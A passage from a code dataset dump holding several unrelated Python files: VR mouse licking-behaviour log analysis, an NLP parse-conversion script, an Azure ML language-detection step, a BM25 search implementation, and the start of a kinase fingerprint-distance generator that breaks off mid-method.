ax_bottom.set_ylabel('speed (cm/s)')\n ax_bottom.set_xlabel('position')\n ax_bottom.set_ylim([min(0, self.speed.min()), max(self.speed.max(), 30)])\n\n bottom, top = plt.ylim()\n left = self.zones[0,0] * self.corridor_length_roxel\n right = self.zones[1,0] * self.corridor_length_roxel\n\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax_bottom.add_patch(polygon)\n if (self.n_zones > 1):\n for i in range(1, np.shape(self.zones)[1]):\n left = self.zones[0,i] * self.corridor_length_roxel\n right = self.zones[1,i] * self.corridor_length_roxel\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax_bottom.add_patch(polygon)\n\n ax2 = ax_bottom.twinx()\n ax2.step(self.bincenters, self.lick_rate, where='mid', c=cmap(180), linewidth=1)\n ax2.set_ylabel('lick rate (lick/s)', color=cmap(180))\n ax2.tick_params(axis='y', labelcolor=cmap(180))\n ax2.set_ylim([-1,max(2*np.nanmax(self.lick_rate), 20)])\n\n plt.show(block=False) \n\n\n\nclass anticipatory_Licks:\n 'simple class for containing anticipatory licking data'\n def __init__(self, baseline_rate, anti_rate, corridor):\n nan_rates = np.isnan(baseline_rate) + np.isnan(anti_rate)\n baseline_rate = baseline_rate[np.logical_not(nan_rates)]\n anti_rate = anti_rate[np.logical_not(nan_rates)]\n self.baseline = baseline_rate\n self.anti_rate = anti_rate\n\n self.m_base = np.mean(self.baseline)\n self.m_anti = np.mean(self.anti_rate)\n if (self.m_base < self.m_anti):\n greater = True\n else:\n greater = False\n self.corridor = int(corridor)\n self.test = scipy.stats.wilcoxon(self.baseline, self.anti_rate)\n self.anti = False\n if ((self.test[1] < 0.01 ) & (greater == True)):\n self.anti = True\n\n\nclass Session:\n 'common base class for low level position and licksensor data in a given session'\n\n def __init__(self, datapath, date_time, name, task, sessionID=-1, printout=False):\n self.name = name\n self.stage = 0\n self.sessionID = sessionID\n self.stages = []\n\n stagefilename = datapath + task + '_stages.pkl'\n input_file = open(stagefilename, 'rb')\n if version_info.major == 2:\n self.stage_list = pickle.load(input_file)\n elif version_info.major == 3:\n self.stage_list = pickle.load(input_file, encoding='latin1')\n input_file.close()\n\n corridorfilename = datapath + task + '_corridors.pkl'\n input_file = open(corridorfilename, 'rb')\n if version_info.major == 2:\n self.corridor_list = pickle.load(input_file)\n elif version_info.major == 3:\n self.corridor_list = pickle.load(input_file, encoding='latin1')\n input_file.close()\n\n self.Laps = []\n self.n_laps = 0\n\n self.get_stage(datapath, date_time, name, task)\n self.corridors = np.hstack([0, np.array(self.stage_list.stages[self.stage].corridors)])\n\n self.get_lapdata(datapath, date_time, name, task)\n self.test_anticipatory()\n\n def get_lapdata(self, datapath, date_time, name, task):\n\n time_array=[]\n lap_array=[]\n maze_array=[]\n position_array=[]\n mode_array=[]\n lick_array=[]\n action=[]\n\n data_log_file_string=datapath + 'data/' + name + '_' + task + '/' + date_time + '/' + date_time + '_' + name + '_' + task + '_ExpStateMashineLog.txt'\n data_log_file=open(data_log_file_string)\n log_file_reader=csv.reader(data_log_file, delimiter=',')\n next(log_file_reader, None)#skip the headers\n for line in log_file_reader:\n time_array.append(float(line[0]))\n lap_array.append(int(line[1]))\n maze_array.append(int(line[2]))\n position_array.append(int(line[3]))\n mode_array.append(line[6] == 'Go')\n lick_array.append(line[9] == 'TRUE')\n action.append(str(line[14]))\n\n laptime = np.array(time_array)\n pos = np.array(position_array)\n lick = np.array(lick_array)\n lap = np.array(lap_array)\n maze = np.array(maze_array)\n mode = np.array(mode_array)\n N_0lap = 0 # Counting the non-valid laps\n self.n_laps = 0\n\n for i_lap in np.unique(lap):\n y = lap == i_lap # index for the current lap\n\n mode_lap = np.prod(mode[y]) # 1 if all elements are recorded in 'Go' mode\n\n maze_lap = np.unique(maze[y])\n if (len(maze_lap) == 1):\n corridor = self.corridors[int(maze_lap)] # the maze_lap is the index of the available corridors in the given stage\n else:\n corridor = -1\n\n if (corridor > 0):\n t_lap = laptime[y]\n pos_lap = pos[y]\n \n lick_lap = lick[y]\n t_licks = t_lap[lick_lap]\n \n istart = np.where(y)[0][0]\n iend = np.where(y)[0][-1] + 1\n action_lap = action[istart:iend]\n \n reward_indices = [j for j, x in enumerate(action_lap) if x == \"TrialReward\"]\n t_reward = t_lap[reward_indices]\n \n actions = []\n for j in range(len(action_lap)):\n if not((action_lap[j]) in ['No', 'TrialReward']):\n actions.append([t_lap[j], action_lap[j]])\n \n \n # sessions.append(Lap_Data(name, i, t_lap, pos_lap, t_licks, t_reward, corridor, mode_lap, actions))\n self.Laps.append(Lap_Data(self.name, self.n_laps, t_lap, pos_lap, t_licks, t_reward, corridor, mode_lap, actions, self.corridor_list))\n self.n_laps = self.n_laps + 1\n else:\n N_0lap = N_0lap + 1 # grey zone (corridor == 0) or invalid lap (corridor = -1)\n\n def get_stage(self, datapath, date_time, name, task):\n action_log_file_string=datapath + 'data/' + name + '_' + task + '/' + date_time + '/' + date_time + '_' + name + '_' + task + '_UserActionLog.txt'\n action_log_file=open(action_log_file_string)\n log_file_reader=csv.reader(action_log_file, delimiter=',')\n next(log_file_reader, None)#skip the headers\n for line in log_file_reader:\n if (line[1] == 'Stage'):\n self.stage = int(round(float(line[2])))\n\n def test_anticipatory(self):\n corridor_ids = np.zeros(self.n_laps)\n for i in range(self.n_laps):\n corridor_ids[i] = self.Laps[i].corridor # the true corridor ID\n corridor_types = np.unique(corridor_ids)\n nrow = len(corridor_types)\n self.anticipatory = []\n\n for row in range(nrow):\n ids = np.where(corridor_ids == corridor_types[row])\n n_laps = np.shape(ids)[1]\n n_zones = np.shape(self.Laps[ids[0][0]].zones)[1]\n if (n_zones == 1):\n lick_rates = np.zeros([2,n_laps])\n k = 0\n for lap in np.nditer(ids):\n lick_rates[:,k] = self.Laps[lap].preZoneRate\n k = k + 1\n self.anticipatory.append(anticipatory_Licks(lick_rates[0,:], lick_rates[1,:], corridor_types[row]))\n\n\n def plot_session(self):\n ## find the number of different corridors\n if (self.n_laps > 0):\n corridor_ids = np.zeros(self.n_laps)\n for i in range(self.n_laps):\n corridor_ids[i] = self.Laps[i].corridor\n corridor_types = np.unique(corridor_ids)\n nrow = len(corridor_types)\n nbins = len(self.Laps[0].bincenters)\n cmap = plt.cm.get_cmap('jet') \n\n rowHeight = 2\n if (nrow > 4):\n rowHeight = 1.5\n fig, axs = plt.subplots(nrows=nrow, ncols=1, figsize=(8,rowHeight*nrow), squeeze=False)\n # plt.figure(figsize=(5,2*nrow))\n speed_color = cmap(30)\n speed_color_trial = (speed_color[0], speed_color[1], speed_color[2], (0.05))\n\n lick_color = cmap(200)\n lick_color_trial = (lick_color[0], lick_color[1], lick_color[2], (0.05))\n\n for row in range(nrow):\n # ax = plt.subplot(nrow, 1, row+1)\n ids = np.where(corridor_ids == corridor_types[row])\n avespeed = np.zeros(nbins)\n n_lap_bins = np.zeros(nbins) # number of laps in a given bin (data might be NAN for some laps)\n n_laps = np.shape(ids)[1]\n maxspeed = 10\n for lap in np.nditer(ids):\n axs[row,0].step(self.Laps[lap].bincenters, self.Laps[lap].ave_speed, where='mid', c=speed_color_trial)\n nans_lap = np.isnan(self.Laps[lap].ave_speed)\n avespeed = nan_add(avespeed, self.Laps[lap].ave_speed)\n n_lap_bins = n_lap_bins + np.logical_not(nans_lap)\n if (max(self.Laps[lap].ave_speed) > maxspeed): maxspeed = max(self.Laps[lap].ave_speed)\n maxspeed = min(maxspeed, 60)\n \n avespeed = nan_divide(avespeed, n_lap_bins, n_lap_bins > 0)\n axs[row,0].step(self.Laps[lap].bincenters, avespeed, where='mid', c=speed_color)\n axs[row,0].set_ylim([-1,1.2*maxspeed])\n\n if (row == 0):\n if (self.sessionID >= 0):\n plot_title = 'session:' + str(self.sessionID) + ': ' + str(int(n_laps)) + ' laps in corridor ' + str(int(corridor_types[row]))\n else:\n plot_title = str(int(n_laps)) + ' laps in corridor ' + str(int(corridor_types[row])) \n else:\n plot_title = str(int(n_laps)) + ' laps in corridor ' + str(int(corridor_types[row]))\n\n if (self.Laps[lap].zones.shape[1] > 0):\n bottom, top = axs[row,0].get_ylim()\n left = self.Laps[lap].zones[0,0] * self.corridor_length_roxel\n right = self.Laps[lap].zones[1,0] * self.corridor_length_roxel\n\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n axs[row,0].add_patch(polygon)\n n_zones = np.shape(self.Laps[lap].zones)[1]\n if (n_zones > 1):\n for i in range(1, np.shape(self.Laps[lap].zones)[1]):\n left = self.Laps[lap].zones[0,i] * self.corridor_length_roxel\n right = self.Laps[lap].zones[1,i] * self.corridor_length_roxel\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n axs[row,0].add_patch(polygon)\n # else: ## test for lick rate changes before the zone\n # self.anticipatory = np.zeros([2,n_laps])\n # k = 0\n # for lap in np.nditer(ids):\n # self.anticipatory[:,k] = self.Laps[lap].preZoneRate\n # k = k + 1\n else: # we look for anticipatory licking tests\n P_statement = ', anticipatory P value not tested'\n for k in range(len(self.anticipatory)):\n if (self.anticipatory[k].corridor == corridor_types[row]):\n P_statement = ', anticipatory P = ' + str(round(self.anticipatory[k].test[1],5))\n plot_title = plot_title + P_statement\n\n axs[row,0].set_title(plot_title)\n\n ax2 = axs[row,0].twinx()\n n_lap_bins = np.zeros(nbins) # number of laps in a given bin (data might be NAN for some laps)\n maxrate = 10\n avelick = np.zeros(nbins)\n for lap in np.nditer(ids):\n ax2.step(self.Laps[lap].bincenters, self.Laps[lap].lick_rate, where='mid', c=lick_color_trial, linewidth=1)\n nans_lap = np.isnan(self.Laps[lap].lick_rate)\n avelick = nan_add(avelick, self.Laps[lap].lick_rate)\n n_lap_bins = n_lap_bins + np.logical_not(nans_lap)\n if (max(self.Laps[lap].lick_rate) > maxrate): maxrate = max(self.Laps[lap].lick_rate)\n maxrate = min(maxrate, 20)\n\n avelick = nan_divide(avelick, n_lap_bins, n_lap_bins > 0)\n ax2.step(self.Laps[lap].bincenters, avelick, where='mid', c=lick_color)\n ax2.set_ylim([-1,1.2*maxrate])\n\n\n if (row==(nrow-1)):\n axs[row,0].set_ylabel('speed (cm/s)', color=speed_color)\n axs[row,0].tick_params(axis='y', labelcolor=speed_color)\n ax2.set_ylabel('lick rate (lick/s)', color=lick_color)\n ax2.tick_params(axis='y', labelcolor=lick_color)\n axs[row,0].set_xlabel('position (roxel)')\n else:\n axs[row,0].set_xticklabels([])\n axs[row,0].tick_params(axis='y', labelcolor=speed_color)\n ax2.tick_params(axis='y', labelcolor=lick_color)\n\n plt.show(block=False)\n else:\n fig = plt.figure(figsize=(8,3))\n # plt.scatter([-4, -3, -2], [2,3,4])\n plt.title('No data to show')\n plt.show(block=False)\n\n\n\n\n# #load trigger log \n# datapath = '/Users/ubi/Projects/KOKI/VR/MiceData/'\n# #datapath = 'C:\\Users\\LN-Treadmill\\Desktop\\MouseData\\\\'\n# #datapath = 'C:\\Users\\Treadmill\\Desktop\\RitaNy_MouseData\\\\'\n\n# # date_time = '2019-11-28_19-37-04' # this was OK!\n# date_time = '2019-11-20_08-15-42' # this was not working!\n# # date_time = '2019-11-28_19-01-06' # this was OK!\n# # date_time = '2019-11-27_09-31-56' # this was OK!\n# # date_time = '2019-11-22_13-51-39' # this was OK!\n# name = 'th'\n# task = 'TwoMazes'\n# mm = Session(datapath, date_time, name, task)\n# #\n# #\n# ## # mm.Laps[181].plot_tx()\n# ## # mm.Laps[12].plot_xv()\n# mm.Laps[25].plot_txv()\n# mm.plot_session()\n\n\n# mm.Laps[17].plot_tx()\n# mm.Laps[17].plot_xv()\n# mm.Laps[55].plot_tx()\n# mm.Laps[55].plot_xv()\n\n\n# for i in range(65):\n# mm.Laps[i].plot_tx()\n# raw_input(\"Press Enter to continue...\")\n\n","sub_path":"LogAnal.py","file_name":"LogAnal.py","file_ext":"py","file_size_in_byte":28603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638925383","text":"import argparse\nimport xnmt.vocabs as vocabs\nimport xnmt.input_readers as input_readers\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\")\nparser.add_argument(\"surface_vocab_file\")\nparser.add_argument(\"nt_vocab_file\")\nparser.add_argument(\"edg_vocab_file\")\nargs = parser.parse_args()\n\nreader = input_readers.CoNLLToRNNGActionsReader(surface_vocab=vocabs.Vocab(vocab_file=args.surface_vocab_file),\n nt_vocab=vocabs.Vocab(vocab_file=args.nt_vocab_file),\n edg_vocab=vocabs.Vocab(vocab_file=args.edg_vocab_file))\n\nfor tree in reader.read_sents(args.input):\n print(str(tree) + \" NONE()\")\n","sub_path":"script/parse/conll_to_actions.py","file_name":"conll_to_actions.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344963902","text":"import argparse\nimport os\nfrom azureml.core import Run\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport scispacy\nimport spacy\nimport en_core_sci_lg\nfrom spacy_langdetect import LanguageDetector\n\n\nclass LangDetect:\n def __init__(self):\n self.run = Run.get_context()\n self.args = None\n self.df = None\n self.articles_in = 0\n self.articles_non_en = 0\n self.nlp = None\n\n self.get_runtime_arguments()\n\n self.load_dataset()\n self.set_nlp_model()\n\n self.collect_metrics_pre()\n self.lang_detect()\n self.log_metrics_post()\n\n self.output_dataset()\n\n def get_runtime_arguments(self):\n print('--- Get Runtime Arguments')\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--input',\n type=str,\n help='Input extract data'\n )\n parser.add_argument(\n '--output',\n type=str,\n help='Output extract data'\n )\n parser.add_argument(\n '--max_doc_length',\n type=int,\n help='Max doc length'\n )\n\n self.args = parser.parse_args()\n\n print('Input: {}'.format(self.args.input))\n print('Output: {}'.format(self.args.output))\n print('Max doc length: {}'.format(self.args.max_doc_length))\n\n def load_dataset(self):\n print('--- Load Data')\n path = self.args.input + \"/processed.csv\"\n self.df = pd.read_csv(path, dtype={\n 'paper_id': str,\n 'body_text': str,\n 'results': str,\n 'bibliography': str,\n 'subset_source': str,\n 'cord_uid': str,\n 'sha': str,\n 'source': str,\n 'title': str,\n 'doi': str,\n 'pubmed_id': str,\n 'abstract': str,\n 'publish_time': str,\n 'authors': str,\n 'journal': str,\n 'url': str})\n\n print('Raw Input Specifications')\n print(self.df.head())\n print(self.df.columns)\n print(self.df.shape)\n\n def set_nlp_model(self):\n print('--- Set NLP Model')\n self.nlp = en_core_sci_lg.load(disable=['tagger', 'ner'])\n self.nlp.max_length = 1000000\n self.nlp.add_pipe(LanguageDetector(), name='language_detector', last=True)\n\n def detect_article_lang(self):\n print('--- Detect Article Language')\n self.df['text_language'] = self.df.body_text.apply(lambda x: self.nlp(str(x[:int(self.args.max_doc_length)]))._.language['language'])\n articles_by_lang = self.df['text_language'].value_counts()\n print(articles_by_lang)\n\n self.articles_non_en = self.df.loc[self.df[self.df.text_language != 'en'].index].shape\n print('Number of non-english articles: {}'.format(str(self.articles_non_en)))\n\n df_temp = pd.DataFrame({'language': articles_by_lang.index, 'Count': articles_by_lang.values})\n df_temp.sort_values(by=['Count'], inplace=True)\n\n fig_name = 'Articles by Lang'\n fig, ax = plt.subplots(figsize=(20, 10))\n sns.barplot(x='language', y='Count', data=df_temp, palette='husl')\n plt.xlabel('Language', fontsize=24)\n plt.ylabel('Articles', fontsize=24)\n ax.tick_params(axis='both', which='major', labelsize=20)\n self.run.log_image(fig_name, plot=fig)\n self.offline_save_fig(fig_name)\n plt.close()\n\n def offline_save_fig(self, name):\n if 'OfflineRun' in self.run._identity:\n full_path = 'plots/' + name + '.png'\n plt.savefig(full_path, dpi=300, format='png')\n\n def drop_non_english_articles(self):\n print('--- Drop Non-English Articles')\n self.df = self.df.drop(self.df[self.df.text_language != 'en'].index)\n print('Number remaining English language articles: {}'.format(str(self.df.shape[0])))\n\n def lang_detect(self):\n self.detect_article_lang()\n self.drop_non_english_articles()\n\n def collect_metrics_pre(self):\n self.articles_in = len(self.df)\n\n def log_metrics_post(self):\n self.run.log('# Articles In', self.articles_in)\n self.run.log('# Articles Non-En', self.articles_non_en)\n self.run.log('# Articles Out', len(self.df))\n\n def output_dataset(self):\n print('--- Output Dataset')\n self.df.drop(columns=['text_language'], inplace=True)\n if not (self.args.output is None):\n os.makedirs(self.args.output, exist_ok=True)\n path = self.args.output + \"/processed.csv\"\n self.df.to_csv(path, index=False)\n print('Output created: {}'.format(path))\n print('Column definition of output')\n print(self.df.columns)\n\n\nif __name__ == \"__main__\":\n print('--- Language Detection Started')\n lang_detect = LangDetect()\n print('--- Language Detection Completed')","sub_path":"code/dataprep/cord19/step_dataprep_lang_detect.py","file_name":"step_dataprep_lang_detect.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69226405","text":"import math\nimport xlwt\n\nimport utils\nimport numpy as np\n\n\nclass BM25(object):\n\n def __init__(self, docs, docs_raw):\n self.docs_raw = docs_raw # 未处理的文档列表,包含id、title、subject、description\n self.docs = docs # 传入已经分好词的文档列表\n self.docs_num = len(docs) # 文档总数量\n self.avgdl = sum([len(doc) + 0.0 for doc in docs]) / self.docs_num # 文档词数平均\n self.docs_f = [] # 存储文档中每个词出现次数(每个文档为一个dict)\n self.df = {} # 存储所有词及出现了该词的文档数量\n self.idf = {} # 存储所有词的idf值 log( (docs_num - df[word] + 0.5) / (df[word] + 0.5) )\n self.k1 = 1.5 # 调整参数\n self.b = 0.75 # 调整参数\n self.init()\n\n # 初始化:计算docs_f、df、idf\n def init(self):\n for doc in self.docs:\n # 计算该文档中每个词的出现次数\n doc_f = {}\n for word in doc:\n doc_f[word] = doc_f.get(word, 0) + 1\n self.docs_f.append(doc_f)\n # 计算df\n for word in doc_f.keys():\n self.df[word] = self.df.get(word, 0) + 1\n # 计算idf\n for word, word_df in self.df.items():\n self.idf[word] = math.log(self.docs_num - word_df + 0.5) - math.log(word_df + 0.5)\n\n # 计算查询式q与索引为index的文档的相似度得分(q为分词后的词列表)\n def bm25_score(self, q, index):\n # 该文档所包含的所有词及其词频\n doc_f = self.docs_f[index]\n # 该文档总词数\n dl = len(self.docs[index])\n # 相关度累计得分\n score = 0\n for word in q:\n if word not in doc_f:\n # 文档中不包含该词\n continue\n else:\n # 文当中包含该词,计算相关度得分并累计 (idf(word) * f(word) * (k1+1)) / (f(word) + k1 * (1-b+b*(dl/avgdl)))\n score += (self.idf[word] * doc_f[word] * (self.k1 + 1)\n / (doc_f[word] + self.k1 * (1 - self.b + self.b * dl / self.avgdl)))\n return score\n\n # 计算所有相似度得分,并输出结果前n项到excel文件\n def bm25_score_all(self, q_raw, file_name, n=100000):\n # 查询式预处理\n q = utils.pretreatment(q_raw)\n print('q_raw:', q_raw)\n print('q:', q)\n\n # 计算查询式与所有文档的相似度\n scores = []\n for index in range(self.docs_num):\n score = self.bm25_score(q, index)\n scores.append(score)\n scores = np.array(scores)\n\n # argsort数组排序,传入-scores是倒序排列。返回排序后的原数组索引 [最大的数的索引, 第二大索引, ...]\n scores_sort_index = np.argsort(-scores)\n # 保存到bm_result.xls\n workbook = xlwt.Workbook(encoding=\"utf-8\")\n sheet = workbook.add_sheet(\"sim_result\")\n # 第一列 id\n sheet.write(0, 0, 'id')\n # 第二列 相似度得分\n sheet.write(0, 1, 'sim_score')\n # 第三列 id\n sheet.write(0, 2, 'id')\n # 第四列 title\n sheet.write(0, 3, 'title')\n # 第五列 subject\n sheet.write(0, 4, 'subject')\n # 第六列 description\n sheet.write(0, 5, 'description')\n for i in range(len(scores)):\n if i < n and scores[scores_sort_index[i]] > 0:\n doc = bm25.docs_raw[scores_sort_index[i]]\n # 第一列 id\n sheet.write(i + 1, 0, str(scores_sort_index[i]+1))\n # 第二列 相似度得分\n sheet.write(i + 1, 1, scores[scores_sort_index[i]])\n # 第三列 id\n sheet.write(i + 1, 2, doc[0])\n # 第四列 title\n sheet.write(i + 1, 3, doc[1])\n # 第五列 subject\n sheet.write(i + 1, 4, doc[2])\n # 第六列 description\n sheet.write(i + 1, 5, doc[3])\n else:\n break\n workbook.save(file_name)\n\n\n# 初始话bm25模型(类),并存储到bm25.pkl文件\ndef bm25_init():\n # 读取数据库\n docs_raw = utils.readDb([\"id\", 'title', 'subject', 'description'])\n # 预处理\n docs = []\n for doc in docs_raw:\n doc_str = ''\n # 按权重合并title、subject、description\n # title\n for i in range(5):\n doc_str += doc[1]\n # subject\n for i in range(3):\n doc_str += doc[2]\n # description\n for i in range(1):\n doc_str += doc[3]\n # 预处理(分词、去停用词)\n doc_words = utils.pretreatment(doc_str)\n docs.append(doc_words)\n # if len(docs) > 1000:\n # break\n bm25 = BM25(docs, docs_raw)\n # 保存bm25模型(类)到bm25.pkl文件\n utils.save_model('bm/bm25.pkl', bm25)\n\n\nif __name__ == '__main__':\n\n # 初始话bm25模型(类),并存储到bm25.pkl文件\n # bm25_init()\n\n # 从bm25.pkl模型中读取bm25模型类\n bm25 = utils.read_model('bm25.pkl')\n\n # 查询式\n q_raw = '农村居民人均可支配收入'\n\n # bm25计算相似度并输出\n bm25.bm25_score_all(q_raw, 'bm_result.xls', 1000)\n","sub_path":"bm/bm.py","file_name":"bm.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"145207543","text":"\"\"\"\nkissim.comparison.fingerprint_distance_generator\n\nDefines the pairwise fingerprint distances for a set of fingerprints.\n\"\"\"\n\nimport datetime\nfrom itertools import repeat\nimport logging\nfrom multiprocessing import cpu_count, Pool\n\nimport numpy as np\nimport pandas as pd\n\nfrom . import FingerprintDistance\n\nlogger = logging.getLogger(__name__)\n\n\nclass FingerprintDistanceGenerator:\n \"\"\"\n Generate fingerprint distances for multiple fingerprint pairs based on their feature distances,\n given a feature weighting scheme.\n Uses parallel computing of fingerprint pairs.\n\n Attributes\n ----------\n distance_measure : str\n Type of distance measure, defaults to scaled Euclidean distance.\n molecule_codes : list of str\n Unique molecule codes associated with all fingerprints (sorted alphabetically).\n kinase_names : list of str\n Unique kinase names associated with all fingerprints (sorted alphabetically).\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic, aliphatic,\n sco, exposure,\n distance_to_centroid, distance_to_hinge_region, distance_to_dfg_region,\n distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n data : pandas.DataFrame\n Fingerprint distance and coverage, plus details on both molecule codes associated with\n fingerprint pairs.\n \"\"\"\n\n def __init__(self):\n\n self.distance_measure = None\n self.feature_weights = None\n self.molecule_codes = None\n self.kinase_names = None\n self.data = None\n\n def from_feature_distances_generator(self, feature_distances_generator, feature_weights=None):\n \"\"\"\n Generate fingerprint distances for multiple fingerprint pairs based on their feature\n distances, given a feature weighting scheme.\n Uses parallel computing of fingerprint pairs.\n\n Parameters\n ----------\n feature_distances_generator : kissim.similarity.FeatureDistancesGenerator\n Feature distances for multiple fingerprint pairs.\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic,\n aliphatic, sco, exposure, distance_to_centroid, distance_to_hinge_region,\n distance_to_dfg_region, distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n \"\"\"\n\n start = datetime.datetime.now()\n\n logger.info(f\"SIMILARITY: FingerprintDistanceGenerator: {feature_weights}\")\n\n # Set class attributes\n self.distance_measure = feature_distances_generator.distance_measure\n self.feature_weights = feature_weights\n self.molecule_codes = feature_distances_generator.molecule_codes\n self.kinase_names = feature_distances_generator.kinase_names\n\n # Calculate pairwise fingerprint distances\n fingerprint_distance_list = self._get_fingerprint_distance_from_list(\n self._get_fingerprint_distance,\n list(feature_distances_generator.data.values()),\n self.feature_weights,\n )\n\n # Format result and save to class attribute\n self.data = pd.DataFrame(\n [\n [i.molecule_pair_code[0], i.molecule_pair_code[1], i.distance, i.bit_coverage]\n for i in fingerprint_distance_list\n ],\n columns=\"molecule_code_1 molecule_code_2 distance coverage\".split(),\n )\n\n end = datetime.datetime.now()\n\n logger.info(f\"Start of fingerprint distance generation: {start}\")\n logger.info(f\"End of fingerprint distance generation: {end}\")\n\n @staticmethod\n def _get_fingerprint_distance_from_list(\n _get_fingerprint_distance, feature_distances_list, feature_weights=None\n ):\n \"\"\"\n Get fingerprint distances based on multiple feature distances\n (i.e. for multiple fingerprint pairs).\n Uses parallel computing.\n\n Parameters\n ----------\n _get_fingerprint_distance : method\n Method calculating fingerprint distance for one fingerprint pair\n (based on their feature distances).\n feature_distances_list : list of kissim.similarity.FeatureDistances\n List of distances and bit coverages between two fingerprints for each of their\n features.\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic,\n aliphatic, sco, exposure, distance_to_centroid, distance_to_hinge_region,\n distance_to_dfg_region, distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n\n Returns\n -------\n list of kissim.similarity.FingerprintDistance\n List of distance between two fingerprints, plus details on molecule codes, feature\n weights and feature coverage.\n \"\"\"\n\n # Get start time of computation\n start = datetime.datetime.now()\n logger.info(f\"Calculate pairwise fingerprint distances...\")\n\n # Number of CPUs on machine\n num_cores = cpu_count() - 1\n logger.info(f\"Number of cores used: {num_cores}\")\n\n # Create pool with `num_processes` processes\n pool = Pool(processes=num_cores)\n\n # Apply function to each chunk in list\n fingerprint_distances_list = pool.starmap(\n _get_fingerprint_distance, zip(feature_distances_list, repeat(feature_weights))\n )\n\n # Close and join pool\n pool.close()\n pool.join()\n\n # Get end time of computation\n logger.info(f\"Number of fingerprint distances: {len(fingerprint_distances_list)}\")\n end = datetime.datetime.now()\n\n logger.info(f\"Start: {start}\")\n logger.info(f\"End: {end}\")\n\n return fingerprint_distances_list\n\n @staticmethod\n def _get_fingerprint_distance(feature_distances, feature_weights=None):\n \"\"\"\n Get the fingerprint distance for one fingerprint pair.\n\n Parameters\n ----------\n feature_distances : kissim.similarity.FeatureDistances\n Distances and bit coverages between two fingerprints for each of their features.\n feature_weights : None or list of float\n Feature weights of the following form:\n (i) None\n Default feature weights: All features equally distributed to 1/15\n (15 features in total).\n (ii) By feature type (list of 3 floats)\n Feature types to be set in the following order: physicochemical, distances, and\n moments.\n (iii) By feature (list of 15 floats):\n Features to be set in the following order: size, hbd, hba, charge, aromatic,\n aliphatic, sco, exposure, distance_to_centroid, distance_to_hinge_region,\n distance_to_dfg_region, distance_to_front_pocket, moment1, moment2, and moment3.\n For (ii) and (iii): All floats must sum up to 1.0.\n\n Returns\n -------\n kissim.similarity.FingerprintDistance\n Distance between two fingerprints, plus details on molecule codes, feature weights and\n feature coverage.\n \"\"\"\n\n fingerprint_distance = FingerprintDistance()\n fingerprint_distance.from_feature_distances(feature_distances, feature_weights)\n\n return fingerprint_distance\n\n def get_structure_distance_matrix(self, fill=False):\n \"\"\"\n Get fingerprint distances for all structure pairs in the form of a matrix (DataFrame).\n\n Parameters\n ----------\n fill : bool\n Fill or fill not (default) lower triangle of distance matrix.\n\n Returns\n -------\n pandas.DataFrame\n Structure distance matrix.\n \"\"\"\n\n # Initialize matrix\n structure_distance_matrix = pd.DataFrame(\n [], columns=self.molecule_codes, index=self.molecule_codes, dtype=float\n )\n\n # Fill matrix with distance values\n for index, row in self.data.iterrows():\n structure_distance_matrix.loc[row.molecule_code_1, row.molecule_code_2] = row.distance\n\n if fill:\n structure_distance_matrix.loc[\n row.molecule_code_2, row.molecule_code_1\n ] = row.distance\n\n # Fill values on matrix main diagonal to 0.0\n for molecule_code in self.molecule_codes:\n structure_distance_matrix.loc[molecule_code, molecule_code] = 0.0\n\n return structure_distance_matrix\n\n def get_kinase_distance_matrix(self, by=\"minimum\", fill=False):\n \"\"\"\n Extract per kinase pair one distance value from the set of structure pair distance values\n and return these fingerprint distances for all kinase pairs in the form of a matrix\n (DataFrame).\n\n Parameters\n ----------\n by : str\n Condition on which the distance value per kinase pair is extracted from the set of\n distances values per structure pair. Default: Minimum distance value.\n fill : bool\n Fill or fill not (default) lower triangle of distance matrix.\n\n Returns\n -------\n pandas.DataFrame\n Kinase distance matrix.\n \"\"\"\n\n # Initialize matrix\n kinase_distance_matrix = pd.DataFrame(\n [], columns=self.kinase_names, index=self.kinase_names, dtype=float\n )\n\n # Fill matrix with distance values\n for index, row in self._get_kinase_distances(by).iterrows():\n kinase_distance_matrix.loc[index[0], index[1]] = row.distance\n\n if fill:\n kinase_distance_matrix.loc[index[1], index[0]] = row.distance\n\n # Fill values on matrix main diagonal to 0.0 which are NaN\n # (i.e. kinases that have only one structure representative)\n for kinase_name in self.kinase_names:\n if np.isnan(kinase_distance_matrix.loc[kinase_name, kinase_name]):\n 